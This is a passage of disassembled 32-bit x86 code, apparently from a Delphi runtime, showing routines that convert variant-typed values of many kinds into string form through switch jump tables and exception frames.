mov edx, [ebp+var_14]
mov eax, esi
call sub_40004B0C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400115C8
loc_400115B8: ; CODE XREF: sub_40011524+A2�j
lea eax, [ebp+var_10]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_400115C1: ; DATA XREF: sub_40011524+2E�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400115B8
; ---------------------------------------------------------------------------
loc_400115C8: ; CODE XREF: sub_40011524+9C�j
; DATA XREF: sub_40011524+8F�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400115EA
loc_400115D5: ; CODE XREF: sub_40011524+C4�j
lea eax, [ebp+var_18]
mov edx, 2
call sub_40005020
retn
; ---------------------------------------------------------------------------
loc_400115E3: ; DATA XREF: sub_40011524+17�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400115D5
; ---------------------------------------------------------------------------
loc_400115EA: ; CODE XREF: sub_40011524+BE�j
; DATA XREF: sub_40011524+AC�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40011524 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400115F0 proc near ; CODE XREF: sub_400116DC+28D�p
var_10 = byte ptr -10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
push esi
mov esi, edx
mov ebx, eax
lea eax, [ebp+var_10]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_40011646
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_10]
call sub_4000E700
lea eax, [ebp+var_10]
call ds:off_4001F29C
lea edx, [ebp+var_10]
mov eax, esi
call sub_400116DC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4001164D
loc_4001163D: ; CODE XREF: sub_400115F0+5B�j
lea eax, [ebp+var_10]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_40011646: ; DATA XREF: sub_400115F0+18�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4001163D
; ---------------------------------------------------------------------------
loc_4001164D: ; CODE XREF: sub_400115F0+55�j
; DATA XREF: sub_400115F0+48�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_400115F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40011654 proc near ; CODE XREF: sub_400116DC+4C0�p
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE4h
push ebx
mov [ebp+var_4], edx
mov ebx, eax
mov eax, [ebp+var_4]
test eax, eax
jz short loc_4001166B
xor edx, edx
mov [eax], edx
loc_4001166B: ; CODE XREF: sub_40011654+11�j
lea edx, [ebp+var_C]
movzx eax, word ptr [ebx]
call sub_40012D98
mov [ebp+var_5], al
cmp [ebp+var_5], 0
jz short loc_400116D0
lea eax, [ebp+var_1C]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_400116C9
push dword ptr fs:[eax]
mov fs:[eax], esp
push 100h
mov ecx, ebx
lea edx, [ebp+var_1C]
mov eax, [ebp+var_C]
mov ebx, [eax]
call dword ptr [ebx+1Ch]
mov eax, [ebp+var_4]
mov edx, [ebp+var_14]
call sub_400048D8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400116D0
loc_400116C0: ; CODE XREF: sub_40011654+7A�j
lea eax, [ebp+var_1C]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_400116C9: ; DATA XREF: sub_40011654+37�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400116C0
; ---------------------------------------------------------------------------
loc_400116D0: ; CODE XREF: sub_40011654+29�j
; sub_40011654+74�j
; DATA XREF: ...
movzx eax, [ebp+var_5]
pop ebx
mov esp, ebp
pop ebp
retn
sub_40011654 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400116DC proc near ; CODE XREF: sub_4000E7FC+19�p
; sub_400115F0+3B�p ...
var_94 = tbyte ptr -94h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov ecx, 0Eh
loc_400116E4: ; CODE XREF: sub_400116DC+D�j
push 0
push 0
dec ecx
jnz short loc_400116E4
push ecx
push ebx
push esi
mov ebx, edx
mov esi, eax
xor eax, eax
push ebp
push offset loc_40011C08
push dword ptr fs:[eax]
mov fs:[eax], esp
movzx eax, word ptr [ebx]
movzx edx, ax
cmp edx, 14h ; switch 21 cases
ja loc_40011945 ; default
; jumptable 4001170F cases 10,14,15
jmp ds:off_40011716[edx*4] ; switch jump
; ---------------------------------------------------------------------------
off_40011716 dd offset loc_4001176A ; DATA XREF: sub_400116DC+33�r
dd offset loc_40011776 ; jump table for switch statement
dd offset loc_4001179E
dd offset loc_400117B9
dd offset loc_400117D3
dd offset loc_400117F4
dd offset loc_40011815
dd offset loc_40011832
dd offset loc_4001184F
dd offset loc_4001192C
dd offset loc_40011945
dd offset loc_40011874
dd offset loc_4001191B
dd offset loc_4001192C
dd offset loc_40011945
dd offset loc_40011945
dd offset loc_4001188F
dd offset loc_400118AA
dd offset loc_400118C5
dd offset loc_400118E0
dd offset loc_400118FE
; ---------------------------------------------------------------------------
loc_4001176A: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
mov eax, esi ; jumptable 4001170F case 0
call sub_40004884
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011776: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
cmp byte_4001AA10, 0 ; jumptable 4001170F case 1
jz short loc_4001178C
mov dx, 100h
mov ax, 1
call sub_4000DBF4
loc_4001178C: ; CODE XREF: sub_400116DC+A1�j
mov eax, esi
mov edx, dword_4001AA14
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_4001179E: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
lea edx, [ebp+var_4] ; jumptable 4001170F case 2
movsx eax, word ptr [ebx+8]
call sub_40007C98
mov edx, [ebp+var_4]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_400117B9: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
lea edx, [ebp+var_8] ; jumptable 4001170F case 3
mov eax, [ebx+8]
call sub_40007C98
mov edx, [ebp+var_8]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_400117D3: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
fld dword ptr [ebx+8] ; jumptable 4001170F case 4
add esp, 0FFFFFFF4h
fstp [esp+94h+var_94]
wait
lea eax, [ebp+var_C]
call sub_40008E14
mov edx, [ebp+var_C]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_400117F4: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
fld qword ptr [ebx+8] ; jumptable 4001170F case 5
add esp, 0FFFFFFF4h
fstp [esp+94h+var_94]
wait
lea eax, [ebp+var_10]
call sub_40008E14
mov edx, [ebp+var_10]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011815: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
push dword ptr [ebx+0Ch] ; jumptable 4001170F case 6
push dword ptr [ebx+8]
lea eax, [ebp+var_14]
call sub_400113EC
mov edx, [ebp+var_14]
mov eax, esi
call sub_40004B0C
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011832: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
push dword ptr [ebx+0Ch] ; jumptable 4001170F case 7
push dword ptr [ebx+8]
lea eax, [ebp+var_18]
call sub_40011424
mov edx, [ebp+var_18]
mov eax, esi
call sub_40004B0C
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_4001184F: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
lea eax, [ebp+var_1C] ; jumptable 4001170F case 8
push eax
mov eax, [ebx+8]
mov ecx, 7FFFFFFFh
mov edx, 1
call sub_40005174
mov edx, [ebp+var_1C]
mov eax, esi
call sub_40004B0C
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011874: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
lea edx, [ebp+var_20] ; jumptable 4001170F case 11
movzx eax, word ptr [ebx+8]
call sub_4001145C
mov edx, [ebp+var_20]
mov eax, esi
call sub_40004B0C
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_4001188F: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
lea edx, [ebp+var_24] ; jumptable 4001170F case 16
movsx eax, byte ptr [ebx+8]
call sub_40007C98
mov edx, [ebp+var_24]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_400118AA: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
lea edx, [ebp+var_28] ; jumptable 4001170F case 17
movzx eax, byte ptr [ebx+8]
call sub_40007C98
mov edx, [ebp+var_28]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_400118C5: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
lea edx, [ebp+var_2C] ; jumptable 4001170F case 18
movzx eax, word ptr [ebx+8]
call sub_40007C98
mov edx, [ebp+var_2C]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_400118E0: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
mov eax, [ebx+8] ; jumptable 4001170F case 19
xor edx, edx
push edx
push eax
lea eax, [ebp+var_30]
call sub_40007D84
mov edx, [ebp+var_30]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_400118FE: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
push dword ptr [ebx+0Ch] ; jumptable 4001170F case 20
push dword ptr [ebx+8]
lea eax, [ebp+var_34]
call sub_40007D84
mov edx, [ebp+var_34]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_4001191B: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
mov eax, [ebx+8] ; jumptable 4001170F case 12
mov edx, eax
mov eax, esi
call sub_400116DC
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_4001192C: ; CODE XREF: sub_400116DC+33�j
; DATA XREF: sub_400116DC:off_40011716�o
lea edx, [ebp+var_38] ; jumptable 4001170F cases 9,13
mov eax, ebx
call sub_40011524
mov edx, [ebp+var_38]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011945: ; CODE XREF: sub_400116DC+2D�j
; sub_400116DC+33�j
; DATA XREF: ...
mov edx, eax ; default
; jumptable 4001170F cases 10,14,15
sub dx, 100h
jz short loc_40011955
dec dx
jz short loc_40011964
jmp short loc_4001197D
; ---------------------------------------------------------------------------
loc_40011955: ; CODE XREF: sub_400116DC+270�j
mov eax, esi
mov edx, [ebx+8]
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011964: ; CODE XREF: sub_400116DC+275�j
lea edx, [ebp+var_3C]
mov eax, ebx
call sub_400115F0
mov edx, [ebp+var_3C]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_4001197D: ; CODE XREF: sub_400116DC+277�j
test ah, 40h
jz loc_40011B91
movzx eax, ax
and eax, 0FFFFBFFFh
cmp eax, 14h ; switch 21 cases
ja loc_40011B7B ; default
; jumptable 40011997 cases 0,1,9,10,13-15
jmp ds:off_4001199E[eax*4] ; switch jump
; ---------------------------------------------------------------------------
off_4001199E dd offset loc_40011B7B ; DATA XREF: sub_400116DC+2BB�r
dd offset loc_40011B7B ; jump table for switch statement
dd offset loc_400119F2
dd offset loc_40011A0F
dd offset loc_40011A2B
dd offset loc_40011A4E
dd offset loc_40011A71
dd offset loc_40011A90
dd offset loc_40011AAF
dd offset loc_40011B7B
dd offset loc_40011B7B
dd offset loc_40011AC0
dd offset loc_40011B6D
dd offset loc_40011B7B
dd offset loc_40011B7B
dd offset loc_40011B7B
dd offset loc_40011ADD
dd offset loc_40011AFA
dd offset loc_40011B17
dd offset loc_40011B34
dd offset loc_40011B51
; ---------------------------------------------------------------------------
loc_400119F2: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
lea edx, [ebp+var_40] ; jumptable 40011997 case 2
mov eax, [ebx+8]
movsx eax, word ptr [eax]
call sub_40007C98
mov edx, [ebp+var_40]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011A0F: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
lea edx, [ebp+var_44] ; jumptable 40011997 case 3
mov eax, [ebx+8]
mov eax, [eax]
call sub_40007C98
mov edx, [ebp+var_44]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011A2B: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
mov eax, [ebx+8] ; jumptable 40011997 case 4
fld dword ptr [eax]
add esp, 0FFFFFFF4h
fstp [esp+94h+var_94]
wait
lea eax, [ebp+var_48]
call sub_40008E14
mov edx, [ebp+var_48]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011A4E: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
mov eax, [ebx+8] ; jumptable 40011997 case 5
fld qword ptr [eax]
add esp, 0FFFFFFF4h
fstp [esp+94h+var_94]
wait
lea eax, [ebp+var_4C]
call sub_40008E14
mov edx, [ebp+var_4C]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011A71: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
mov eax, [ebx+8] ; jumptable 40011997 case 6
push dword ptr [eax+4]
push dword ptr [eax]
lea eax, [ebp+var_50]
call sub_400113EC
mov edx, [ebp+var_50]
mov eax, esi
call sub_40004B0C
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011A90: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
mov eax, [ebx+8] ; jumptable 40011997 case 7
push dword ptr [eax+4]
push dword ptr [eax]
lea eax, [ebp+var_54]
call sub_40011424
mov edx, [ebp+var_54]
mov eax, esi
call sub_40004B0C
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011AAF: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
mov eax, esi ; jumptable 40011997 case 8
mov edx, [ebx+8]
mov edx, [edx]
call sub_40004AAC
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011AC0: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
lea edx, [ebp+var_58] ; jumptable 40011997 case 11
mov eax, [ebx+8]
movzx eax, word ptr [eax]
call sub_4001145C
mov edx, [ebp+var_58]
mov eax, esi
call sub_40004B0C
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011ADD: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
lea edx, [ebp+var_5C] ; jumptable 40011997 case 16
mov eax, [ebx+8]
movsx eax, byte ptr [eax]
call sub_40007C98
mov edx, [ebp+var_5C]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011AFA: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
lea edx, [ebp+var_60] ; jumptable 40011997 case 17
mov eax, [ebx+8]
movzx eax, byte ptr [eax]
call sub_40007C98
mov edx, [ebp+var_60]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011B17: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
lea edx, [ebp+var_64] ; jumptable 40011997 case 18
mov eax, [ebx+8]
movzx eax, word ptr [eax]
call sub_40007C98
mov edx, [ebp+var_64]
mov eax, esi
call sub_400048D8
jmp loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011B34: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
mov eax, [ebx+8] ; jumptable 40011997 case 19
mov eax, [eax]
xor edx, edx
push edx
push eax
lea eax, [ebp+var_68]
call sub_40007D84
mov edx, [ebp+var_68]
mov eax, esi
call sub_400048D8
jmp short loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011B51: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
mov eax, [ebx+8] ; jumptable 40011997 case 20
push dword ptr [eax+4]
push dword ptr [eax]
lea eax, [ebp+var_6C]
call sub_40007D84
mov edx, [ebp+var_6C]
mov eax, esi
call sub_400048D8
jmp short loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011B6D: ; CODE XREF: sub_400116DC+2BB�j
; DATA XREF: sub_400116DC:off_4001199E�o
mov eax, [ebx+8] ; jumptable 40011997 case 12
mov edx, eax
mov eax, esi
call sub_400116DC
jmp short loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011B7B: ; CODE XREF: sub_400116DC+2B5�j
; sub_400116DC+2BB�j
; DATA XREF: ...
lea edx, [ebp+var_70] ; default
; jumptable 40011997 cases 0,1,9,10,13-15
mov eax, ebx
call sub_40011524
mov edx, [ebp+var_70]
mov eax, esi
call sub_400048D8
jmp short loc_40011BB9
; ---------------------------------------------------------------------------
loc_40011B91: ; CODE XREF: sub_400116DC+2A4�j
mov eax, esi
call sub_40004884
mov edx, eax
mov eax, ebx
call sub_40011654
test al, al
jnz short loc_40011BB9
lea edx, [ebp+var_74]
mov eax, ebx
call sub_40011524
mov edx, [ebp+var_74]
mov eax, esi
call sub_400048D8
loc_40011BB9: ; CODE XREF: sub_400116DC+95�j
; sub_400116DC+BD�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40011C0F
loc_40011BC6: ; CODE XREF: sub_400116DC+531�j
lea eax, [ebp+var_74]
mov edx, 7
call sub_400048A8
lea eax, [ebp+var_58]
mov edx, 3
call sub_40005020
lea eax, [ebp+var_4C]
mov edx, 0Bh
call sub_400048A8
lea eax, [ebp+var_20]
mov edx, 4
call sub_40005020
lea eax, [ebp+var_10]
mov edx, 4
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_40011C08: ; DATA XREF: sub_400116DC+19�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40011BC6
; ---------------------------------------------------------------------------
loc_40011C0F: ; CODE XREF: sub_400116DC+52B�j
; DATA XREF: sub_400116DC+4E5�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_400116DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40011C18 proc near ; CODE XREF: sub_40011DFC+247�p
; sub_40011DFC+496�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
push esi
xor ecx, ecx
mov [ebp+var_14], ecx
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_40011CC2
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_10]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_40011CA5
push dword ptr fs:[eax]
mov fs:[eax], esp
push 8
push 0
push 400h
push ebx
lea eax, [ebp+var_10]
push eax
mov eax, off_4001B064
mov eax, [eax]
call eax
movzx edx, word ptr [ebx]
mov cx, 8
call sub_4000E034
push esi
lea eax, [ebp+var_14]
mov edx, [ebp+var_8]
call sub_4000511C
mov eax, [ebp+var_14]
mov ecx, 7FFFFFFFh
mov edx, 1
call sub_40005174
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40011CAC
loc_40011C9C: ; CODE XREF: sub_40011C18+92�j
lea eax, [ebp+var_10]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_40011CA5: ; DATA XREF: sub_40011C18+2B�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40011C9C
; ---------------------------------------------------------------------------
loc_40011CAC: ; CODE XREF: sub_40011C18+8C�j
; DATA XREF: sub_40011C18+7F�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40011CC9
loc_40011CB9: ; CODE XREF: sub_40011C18+AF�j
lea eax, [ebp+var_14]
call sub_40005008
retn
; ---------------------------------------------------------------------------
loc_40011CC2: ; DATA XREF: sub_40011C18+14�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40011CB9
; ---------------------------------------------------------------------------
loc_40011CC9: ; CODE XREF: sub_40011C18+A9�j
; DATA XREF: sub_40011C18+9C�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40011C18 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40011CD0 proc near ; CODE XREF: sub_40011DFC+27F�p
var_10 = byte ptr -10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
push esi
mov esi, edx
mov ebx, eax
lea eax, [ebp+var_10]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_40011D26
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_10]
call sub_4000E700
lea eax, [ebp+var_10]
call ds:off_4001F29C
lea edx, [ebp+var_10]
mov eax, esi
call sub_40011DFC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40011D2D
loc_40011D1D: ; CODE XREF: sub_40011CD0+5B�j
lea eax, [ebp+var_10]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_40011D26: ; DATA XREF: sub_40011CD0+18�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40011D1D
; ---------------------------------------------------------------------------
loc_40011D2D: ; CODE XREF: sub_40011CD0+55�j
; DATA XREF: sub_40011CD0+48�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40011CD0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40011D34 proc near ; CODE XREF: sub_40011DFC+4B2�p
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
xor ecx, ecx
mov [ebp+var_20], ecx
mov [ebp+var_4], edx
mov ebx, eax
mov eax, [ebp+var_4]
test eax, eax
jz short loc_40011D50
xor edx, edx
mov [eax], edx
loc_40011D50: ; CODE XREF: sub_40011D34+16�j
xor eax, eax
push ebp
push offset loc_40011DEC
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_C]
movzx eax, word ptr [ebx]
call sub_40012D98
mov [ebp+var_5], al
cmp [ebp+var_5], 0
jz short loc_40011DD6
lea eax, [ebp+var_1C]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_40011DCF
push dword ptr fs:[eax]
mov fs:[eax], esp
push 8
mov ecx, ebx
lea edx, [ebp+var_1C]
mov eax, [ebp+var_C]
mov ebx, [eax]
call dword ptr [ebx+1Ch]
mov eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
mov edx, [ebp+var_14]
call sub_4000511C
mov eax, [ebp+var_20]
mov ecx, 7FFFFFFFh
mov edx, 1
call sub_40005174
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40011DD6
loc_40011DC6: ; CODE XREF: sub_40011D34+A0�j
lea eax, [ebp+var_1C]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_40011DCF: ; DATA XREF: sub_40011D34+4A�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40011DC6
; ---------------------------------------------------------------------------
loc_40011DD6: ; CODE XREF: sub_40011D34+3C�j
; sub_40011D34+9A�j
; DATA XREF: ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40011DF3
loc_40011DE3: ; CODE XREF: sub_40011D34+BD�j
lea eax, [ebp+var_20]
call sub_40005008
retn
; ---------------------------------------------------------------------------
loc_40011DEC: ; DATA XREF: sub_40011D34+1F�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40011DE3
; ---------------------------------------------------------------------------
loc_40011DF3: ; CODE XREF: sub_40011D34+B7�j
; DATA XREF: sub_40011D34+AA�o
movzx eax, [ebp+var_5]
pop ebx
mov esp, ebp
pop ebp
retn
sub_40011D34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40011DFC proc near ; CODE XREF: sub_4000E7B0+19�p
; sub_4000EBF8+1F�p ...
var_90 = tbyte ptr -90h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov ecx, 0Eh
loc_40011E04: ; CODE XREF: sub_40011DFC+D�j
push 0
push 0
dec ecx
jnz short loc_40011E04
push ebx
push esi
mov ebx, edx
mov esi, eax
xor eax, eax
push ebp
push offset loc_40012341
push dword ptr fs:[eax]
mov fs:[eax], esp
movzx eax, word ptr [ebx]
movzx edx, ax
cmp edx, 14h ; switch 21 cases
ja loc_40012057 ; default
; jumptable 40011E2E cases 10,14,15
jmp ds:off_40011E35[edx*4] ; switch jump
; ---------------------------------------------------------------------------
off_40011E35 dd offset loc_40011E89 ; DATA XREF: sub_40011DFC+32�r
dd offset loc_40011E95 ; jump table for switch statement
dd offset loc_40011EBD
dd offset loc_40011ED8
dd offset loc_40011EF2
dd offset loc_40011F13
dd offset loc_40011F34
dd offset loc_40011F51
dd offset loc_40011F6E
dd offset loc_4001203E
dd offset loc_40012057
dd offset loc_40011F86
dd offset loc_4001202D
dd offset loc_4001203E
dd offset loc_40012057
dd offset loc_40012057
dd offset loc_40011FA1
dd offset loc_40011FBC
dd offset loc_40011FD7
dd offset loc_40011FF2
dd offset loc_40012010
; ---------------------------------------------------------------------------
loc_40011E89: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
mov eax, esi ; jumptable 40011E2E case 0
call sub_40005008
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40011E95: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
cmp byte_4001AA10, 0 ; jumptable 40011E2E case 1
jz short loc_40011EAB
mov dx, 8
mov ax, 1
call sub_4000DBF4
loc_40011EAB: ; CODE XREF: sub_40011DFC+A0�j
mov eax, esi
mov edx, dword_4001AA14
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40011EBD: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
lea edx, [ebp+var_4] ; jumptable 40011E2E case 2
movsx eax, word ptr [ebx+8]
call sub_40007C98
mov edx, [ebp+var_4]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
